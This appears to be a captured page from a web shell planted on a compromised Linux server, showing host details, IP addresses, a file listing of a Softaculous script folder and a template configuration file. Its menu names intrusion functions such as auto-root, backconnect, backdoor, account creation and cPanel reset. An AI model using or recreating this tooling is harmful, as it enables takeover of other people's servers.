Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.144.224.116
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
etano /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
6.24
KB
-rw-r--r--
csrf-secret.php
30
B
-rw-r--r--
defines.inc.php
1.27
KB
-rw-r--r--
edit.php
3.73
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
1.79
KB
-rw-r--r--
import.php
2.86
KB
-rw-r--r--
info.xml
1.66
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.8
KB
-rw-r--r--
install.xml
909
B
-rw-r--r--
md5
6.42
KB
-rw-r--r--
notes.txt
299
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : defines.inc.php
<?php define('_DBHOST_','[[softdbhost]]');// mysql server host name define('_DBUSER_','[[softdbuser]]');// mysql database username define('_DBPASS_','[[softdbpass]]');// mysql database password define('_DBNAME_','[[softdb]]');// mysql database name define('_SITENAME_','[[site_name]]');// Your site name define('_BASEURL_','[[softurl]]');// protocol required (http:// ) define('_BASEPATH_','[[softpath]]');// path on server to your site define('_PHOTOURL_',_BASEURL_.'/media/pics');// protocol required (http:// ). URL to your member photos define('_PHOTOPATH_',_BASEPATH_.'/media/pics');// path on server to your member photos define('_CACHEPATH_',_BASEPATH_.'/cache');// path on server to the cache folder define('_FILEOP_MODE_','disk'); define('_FTPHOST_',''); define('_FTPPATH_',''); define('_FTPUSER_',''); define('_FTPPASS_',''); $dbtable_prefix=$GLOBALS['dbtable_prefix']='dsb_'; define('USER_ACCOUNTS_TABLE',"{$dbtable_prefix}user_accounts"); define('USER_ACCOUNT_ID','user_id'); define('USER_ACCOUNT_USER','user'); define('USER_ACCOUNT_PASS','pass'); define('PASSWORD_ENC_FUNC','md5'); define('_LICENSE_KEY_','[[key_gen]]'); // md5()=[[md5_key_gen]] define('_INTERNAL_VERSION_','2.80'); $accepted_results_per_page=array(10=>10,5=>5,15=>15,20=>20); $accepted_images=array('jpg','jpeg','png');
Close